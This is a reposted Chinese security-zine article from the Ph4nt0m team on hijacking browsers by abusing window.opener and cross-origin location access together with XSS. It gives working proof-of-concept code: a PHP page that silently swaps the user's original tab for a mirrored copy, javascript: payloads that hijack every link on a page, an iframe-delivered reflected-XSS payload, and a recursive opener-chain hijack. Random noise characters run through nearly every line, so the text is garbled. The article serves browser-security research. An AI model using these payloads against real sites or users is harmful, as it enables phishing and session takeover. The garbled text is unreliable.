==Ph4nt0m Security Team==1 g/ q; g) O( r
8 g5 v6 H5 U K: ?7 x+ i- L Issue 0x03, Phile #0x05 of 0x07) b% {: ~8 [1 M0 C ]8 ~
; F' c# [0 s3 z4 U i
/ r6 W. a- K2 Y6 b9 r* K|=---------------------------------------------------------------------------=|
' n4 I+ c( a5 h9 G9 f|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
/ j n7 g @ i* b/ {|=---------------------------------------------------------------------------=|$ i4 `1 x& Y% P" L
|=---------------------------------------------------------------------------=|, Z0 @3 g- x! E; F! {+ h
|=------------------------=[ By rayh4c ]=---------------------------=|9 J' U, B1 r. e3 z D. j
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|# l, u/ Q6 X9 }, r/ n" l
|=---------------------------------------------------------------------------=|
2 h# Y- C- X9 |0 T2 X# u/ B" |; I2 V$ e+ j h0 D/ S* Q
, u. m* @% T1 G$ w1 j, m( Y# C
[目录]
( p) ?; y9 Z& e% |
T h) {+ c# @ f5 h1. 前言
% X$ p7 Z3 h s: a7 L' O' j2. 同源策略简叙
# I: ~2 k: B- m/ o, e3. 理解window对象的同源策略
" _+ q2 Z, J ?1 s4. 窗口引用功能中的同源策略漏洞
, y( Q) q+ e) i# I. | 4.1 父窗口引用子窗口的同源策略问题
3 x( T4 R, Q+ T" Y 4.2 子窗口引用父窗口的同源策略问题
8 G2 k- [* V- v5. 利用窗口引用漏洞劫持浏览器" l y! D% R: r% u
6. 利用XSS漏洞劫持浏览器
! J2 F' D, q9 D 6.1 正向跨窗口劫持
: v6 L! P/ f7 n# @, F4 S% x. E: T 6.2 反向跨窗口劫持 N/ v" T! z, E/ j
6.3 极度危险的跨框架窗口引用劫持. A1 S$ ^) N4 v& y; u
6.4 极度危险的正反向跨窗口递归劫持
1 {" T6 b6 T! W2 s/ V 6.5 完全控制浏览器8 Z: \0 {3 s- G' ~
7. 后记
8 X0 V: C* ^* T0 `" S; i1 [8. 参考/ G2 M% v) K5 e. a; w; q1 `- c3 C
& N2 v' y! u! |- ?
6 x8 I' j# f3 v
一、前言
5 ]9 J2 a$ _8 N( b3 j9 J3 Z: H& ?; k& N, R' Y: E( h, |# c1 A7 L
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋( R/ e1 O: T/ u* x. p/ W; J$ F
友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session
6 Z/ F% `: V) I& L! j: s( L劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被5 q+ q! }& O O1 M
条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。; ^# a' ]" f' T. M5 p" ], z; B
- K3 A ` r8 M& |
, a5 \+ {8 k: F6 b% E
二、同源策略简叙
" o: h @* e8 t& C
J( R! A5 M: V3 h 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以
/ t2 y7 ^0 D- ?+ a从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都* H4 d; ~ z) v5 M$ i! y+ ]
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木
. ~2 e! J: d( P马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个: E Q# S' J( d
漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。& [: a1 |2 e+ {; `
o) q2 T' J4 r7 i0 e# K2 G3 q9 [! r# G' S' Z X3 v' M; z
三、理解window对象的同源策略
5 F8 ]/ a; B9 u j$ J* e! n) g2 v9 K# |8 ^ h- q& B! G
窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对
& ^) c4 ^! s1 k象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:
7 v4 w a( K& s% K; T3 ]$ u7 Q$ r; I, r3 d
--code-------------------------------------------------------------------------' e, W: x0 U, ^
<script language="javascript">; O6 o! J$ R. \
for(p in window) document.write(p+"<br>");7 U( `% w1 i$ k! p3 J$ g2 q( w
</script>
8 W; \) g4 ]5 {! e0 P% A- K-------------------------------------------------------------------------------0 v0 F0 q! Q- d3 q6 W4 `: {
$ [& k" I3 n9 ^) Y% t# q 这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方
, Y G! O, J! _7 A# E, l. @法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,% U0 U) D- W+ Q
这些属性和方法就必须遵循同源策略。) b! ^/ j6 z6 Q: a, Z3 j
/ w% c+ `( ~! C
举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那% E2 J( G! H. _! a( Y: N. A6 |0 @
么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须
$ z3 Y5 ?& m2 b' Y; O1 ]1 ~的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这 B }/ j1 v* c7 r+ S
个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的2 n; g/ ^ U/ D7 u6 G k" d( {
值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location
$ @: [/ E5 I/ U& b0 [属性并没有被拒绝访问。
3 W& K: K( }0 O! m0 ]$ y5 E6 X) j; |5 P! y1 E' B
--demo.html-------------------------------------------------------------------- Y$ j- U! C. q! j4 w4 d% X, s9 u
<script language="javascript">
+ w, @: f! o/ Y8 Rfunction allPrpos(obj) { ' Q4 ]/ j d, ~( q. u
var props = "<table><tr><td>名称</td><td>值</td>"; 3 S$ r: D0 c7 `+ w f+ H; x
for(var p in obj){ ) O9 f& i' {6 f& R: _
if(typeof(obj[p])=="function"){ ' Y0 M5 g$ y+ \6 y& o" o
obj[p]();
/ C, O. G* E, e+ m0 }) |* R* G }else{ : b9 h! ]/ A: M3 u# P# z* H* h
try / {) o7 l1 ~ R
{
+ f1 e: `) Q+ ^! A; t% L2 u; p3 ` props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
: ~: a% F, R* t) b } ) a, X' U6 X$ x. @
catch (ex)
+ _6 Q, j& w7 Z3 I7 a' D {
% Y2 N+ u* ]3 D B( g( W# p
3 j; M- y/ V! h8 C1 ?' J props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>";
9 B4 C' m# @' o8 y } 6 u3 l) `6 S: Z" v
% h9 v9 r; G/ P, E
} - V/ {- o: M) T. K4 L
} 6 @7 F" G1 V& I$ q! P4 M
0 K: T" H/ g! K# l document.write(props+"</table>"); 7 V$ p% U+ w/ Q( ^3 w+ l, W
} " A) A; i; `# {6 C
5 ]3 V1 T* ~, {; B/ U
function createWin() {$ \6 T Q) p& a' v4 @+ L
newWin = window.open ("http://www.google.com");
z8 z9 v7 X1 }. ?& A8 [ setTimeout(function(){allPrpos(newWin)},2000);
/ S0 Y! F. Z2 G/ J5 M$ B$ e}
# P* h! Q8 N2 L: H7 M
7 c6 _' T, f. p- v% k</script>
; N( C# @1 l. a, c# P, c3 X0 m0 i; E' _2 ?+ k, r& f2 H
<button onclick='createWin()'>创建一个非同源子窗口测试</button>4 q \' d s( D% z! g
-------------------------------------------------------------------------------
( q8 N) C! P. k# m$ w
7 G/ g2 v+ h2 N9 h$ D* {& X: H c! x b; I/ C V
四、窗口引用功能中的同源策略漏洞
; k) C: f. a* Y$ |9 T4 P3 J0 C" l6 i6 C: [! M
4.1 父窗口引用子窗口的同源策略问题
" M+ Y% p2 n$ S% `. Z f n& a: Q6 J' _. Z- c
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复, h m5 H, s/ i2 E% r7 Y
但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道: l8 g- P0 |* F5 \" X
浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进
* q6 J, G: Z# e3 o! B' j行测试,会发现父窗口可以控制非同源子窗口location属性值。7 _5 N& Z; Y* e; y: u. A( c
5 s0 U0 X& r( N( [. k! k" A* ?
--vul1.html--------------------------------------------------------------------. Q% h7 d# b3 h* B! Y9 _
<script language="javascript"> , M: o0 W* u5 y0 ]0 T% L
function createWin() { 5 ?5 ? T* g0 ]* F, I; h# X
newWin = window.open ("http://www.google.com"); " l& B! a: e9 ~( z1 _
setTimeout(function(){newWin.location="http://www.80sec.com"},2000); 3 v, Y$ ]1 m7 w8 D# u' ]4 R
} - r8 U$ O7 ^% m- `( ^
</script>
& n0 D {5 z, p0 l! ~: i9 \% \% E9 ]+ @4 G1 B1 }6 `' ^
<button onclick='createWin()'>创建一个非同源子窗口测试</button>; X7 e. U: M* s: u+ i& n
-------------------------------------------------------------------------------
8 |- B+ F* F/ m9 @
& l3 S$ ^, n" o; u. n
: ]& `$ W& A% E! e# J! T8 [: q' W4.2 子窗口引用父窗口的同源策略问题
6 n9 h. g- y+ {8 d
+ o l* j# j. l" z 逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使5 J& l7 d" t& [; T# ?
用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们
9 m. h* u7 [* V" E8 H可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定
2 b$ N* M8 D( D; D6 l" i# M, ]会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。+ E0 ^4 J, z3 K( ^; D' _
$ Z1 X, V) G9 N--code-------------------------------------------------------------------------
" \" l/ l8 S0 O# G p/ H- Q6 U e0 e/ D9 @" [
javascript:window.opener.location = "http://www.80sec.com";void(0);' Q% ^- l* \/ Z6 |5 W% t2 u
( V9 A( }! [& R" o; x-------------------------------------------------------------------------------
- K9 d* ]) b* ]: J& G+ X3 @" C7 v0 u( G6 q1 W! P2 v+ Q" K! x: O
& a2 t/ F2 U |/ @4 A
五、利用窗口引用漏洞劫持浏览器' N% Z7 `* C5 K9 t
& H* u1 J% u, h9 O
经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子
+ @, W8 A1 _# P$ y3 [4 r7 O; x+ M窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那4 X8 |/ ?; B, K2 M
么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。6 {& E& p$ h$ |3 S6 }
1 _' k- g }/ A, [9 {# ] 我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产
/ n! b, v! Z+ I' V- W0 g* A: s生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或
' ]$ `0 [9 r4 i( T4 Z者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接3 Q2 {' W& L+ l1 l, e5 r
后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下
9 r. f `. Z+ W: o4 M5 k5 }会产生什么可怕的后果。
' F* q# x" X+ f7 l' @" e' C2 Y0 N" C4 t$ @; E- B! w' g
下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我
, u3 p& h5 ]3 p: y% ^1 k们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php8 [. y! k% {% A# z: d7 I
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时
' ]: |0 f! W1 K6 D候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可8 k: a5 J3 g# o1 @9 f- g) `
以做更多的事情,所有的一切仅仅是因为点击了一个链接。3 Q' ]; ~' J6 w1 D: O# w* K- v9 d
" Y5 l2 @- }2 {) m/ d
--hjk_ref.php------------------------------------------------------------------
7 ]* W0 J7 x4 I2 _0 L, V! t<?php
' b# `* H6 G fif (array_key_exists("HTTP_REFERER", $_SERVER)) {
8 L$ n- |) Q. y. G$Url_Mirror = $_SERVER["HTTP_REFERER"];" U, d I4 u: U' r7 T
}
: g+ t8 m. y3 X- {/ G! H1 Qif(isset ($_GET['ref'])) {
4 Z4 n5 y6 H- K' v# R& Iecho file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';
! q, @: Q( z, N& c}
, r# U8 @) L. o: N9 p5 l?>" V; u6 |: V! z* N
) {/ i. a# G4 g% S, B( U0 d
<script language="javascript">2 v c1 m+ J, ~/ s# ^( b/ \. v
setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
/ C' \4 F7 i/ M1 L# @% \7 L9 U</script>
3 Y# _( `8 \% h5 ~-------------------------------------------------------------------------------' v" Y P7 w9 g) `$ d/ r( P
5 Q: Z1 T: T& f; @( Q 注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。: z: s8 ~+ U6 t! e- N
+ H8 j. n2 e( [, U' D: T
0 ~3 h8 U2 X" z. u8 Q六、利用XSS漏洞劫持浏览器" q" y6 G ~2 I8 a! a
9 S: R& k% d( Y" `6 [$ I5 m
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为) w. s9 [: C, ?' k0 ]% A8 H& c; q
持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后4 S- J9 z+ L9 @
XSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起. d4 }; K( O ^
讨论跨站师的终极技巧:, k, ^* A6 d7 R7 z `* `4 c
- u. s- @* b' i ~( O- y
/ {! L5 t$ r+ C. F7 r3 `. p' J$ q. j6.1 正向跨窗口劫持
5 P5 P2 i2 }2 ]+ q
# Z( U/ E; v% B- D4 N/ L7 [$ w2 H 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛6 l" n, {5 S* D8 Z. P
主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链) V5 ] k0 b# t0 v( [- Z
接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话& P( G) k" ?5 N2 [2 v) L4 w
框脚本。
) I7 y8 n2 |" {, o& B: {, M# K+ x9 {
--hijack_open.js--------------------------------------------------------------- S# G1 n: }* ?. Q& _, D# N4 P
6 k& l+ |+ v. R k- vjavascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
) V$ R2 R0 g5 k5 ]; T
& r4 G# T* t: K-------------------------------------------------------------------------------
- C6 {' W1 A" G/ ?8 ?, P, j, m5 t b5 t( D6 W, L7 I! I9 N1 u- `
7 w- j; v1 {0 [5 a! I6.2 反向跨窗口劫持7 O2 v7 u3 T# E
& a+ y* y# [/ P8 R' k& \% h 同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代
* {3 A8 l# C; d: @* r* ~' e码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话) n: S" |& ^# P }4 | c
框脚本。6 }: q% b2 q$ o; P4 {
4 R3 p" T7 H1 R
--hijack_opener.js-------------------------------------------------------------
- _& X5 z: \* V5 F) O3 @5 K2 G3 S$ I1 _; P4 O
javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);4 [ u* x/ a, c9 F' O$ r6 F4 Y- [
% C% M2 n* }5 U; Y4 B: O% T2 o-------------------------------------------------------------------------------+ i) g- |& f. u4 y
- x- }% ]2 I. B! p1 @2 P' J
* e# {9 z7 l& o$ I: h* Q( h( I; c, j
6.3 极度危险的跨框架窗口引用劫持
: n3 I9 B v, E& s6 f! S% M3 C0 X' r+ ?: ~ [
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞
8 c6 x) b% j# p$ P+ |& Z3 M可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就! _4 e# F7 o- i ^) a
适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
9 X- M) _' E: W非持久型的XSS,如下:
8 \' I% p/ o0 u+ n
6 b, k( q& u: e2 r) _0 g8 _/ D<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>
3 l0 l0 F, L2 }; |2 f% t D0 A" h, }2 J% h4 ~: w I1 i
在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口0 a2 ?9 t. q z$ E8 _
注入脚本。
& e( m$ }+ g: o4 [7 B4 R+ ~7 f) O; ?5 A7 r3 E, V& L$ [: h
--hijack_frame_opener.js-------------------------------------------------------6 f7 Q' v3 c/ v/ O
<script>
2 t$ T- p* P9 e8 z/ u* ~window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";! b5 B7 p q, }4 S) J3 `5 A
</script>
6 j* I- I% x7 C' p% a& f. c-------------------------------------------------------------------------------
* ?& d8 ~0 d `
. e [5 g' ?, U6 h5 {! |4 D/ |
- J: ~; z; g9 ?' c$ y( ^4 K6.4 极度危险的正反向跨窗口递归劫持) c1 c' y6 ? `' U$ z; _
+ d6 i0 i; ~; k$ n9 i& J) E$ H luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window
9 Y7 @; s1 [' d* [的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过7 l# v7 Q: h5 j0 o6 K( J
异常处理规避之间跨域页面的访问异常,代码如下:% j5 S9 r. k; a
' f* T( R) j+ Y; d( E
--code-------------------------------------------------------------------------5 v9 Z, _8 P+ }4 R" \' I% U/ {
$ j1 ?9 g& i& x H; e6 \9 T' Vjavascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);# R3 _; S. ~$ v* t7 @6 z! P
6 A( f4 M, f2 q$ G1 r4 H# R-------------------------------------------------------------------------------
) y, Y! F9 J9 T) v1 N" J2 G( e( Y& }4 ~
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可
' V f) Y' \ \2 E0 B, R2 R以劫持B域之前的A域页面,从而实现“隔空打击”。
b1 F0 k4 I5 G0 O. p6 t% j" y
: J$ _9 [* g @ Q 同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面
) K3 |/ b$ w9 |. G执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
8 U! f: C/ q! n4 i
/ p6 B" F' T: `$ | 结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。( ?) b9 l( D- _+ G2 R
8 M. c3 M; w. I. n5 b8 u9 M O8 T% X6 e" D1 p! c% r$ B1 {
6.5 完全控制浏览器9 q' A" I8 c1 p; ?
6 y" L. t( l, r; N$ T4 l' m
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则* ^. n1 C# ~4 `$ S* w/ c& T
是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS* ^" v, b' a) {! p
漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失1 K2 M r1 G8 D+ c$ S
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再* B3 X! `3 P1 _9 j' m
列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站8 b& l3 q" `" O, y/ Z( l9 b3 g
师的终极目标 - 完全控制浏览器。$ ]" ^4 V: Q. j) H8 v
4 Z6 n" f+ A2 U* F8 [5 Q' x7 m! \, q6 q4 b$ e8 i9 {
七、后记
4 |, C$ M' N, i/ c+ }1 m* Y2 X
8 s* [# s, _ m: }# _3 _" }! c 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全! @$ N4 b* W! k- \
与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予& r3 ?- Q/ d! k: ?' i
过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。* r7 \& S& C9 E' n2 Y' t
( \! y+ d2 ^1 k0 F: m. b" ]8 \5 Q+ [9 r+ c' N
八、参考; Y2 F: x# X# ?+ p
. s1 b- D# J4 T; b4 v
1. http://en.wikipedia.org/wiki/Same_origin_policy" G j' B# R# X7 L6 ~3 O( q
2. http://code.google.com/p/browser ... licy_for_DOM_access, d' w8 W B/ Q8 R
3. http://www.w3.org/TR/Window/) L: N# l& a! X5 \' w- F4 `
4. http://www.80sec.com/release/browser-hijacking.txt
* c+ r w/ `5 E( }5. http://www.80sec.com/all-browser-security-alert.html
" h. U# N, H7 }" u/ L6. http://www.80sec.com/ms08-058-attacks-google.html3 q- |. p' ]# K1 ?% S" ?5 [% b/ A
, I' i: F- Y# K, V0 Q
-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对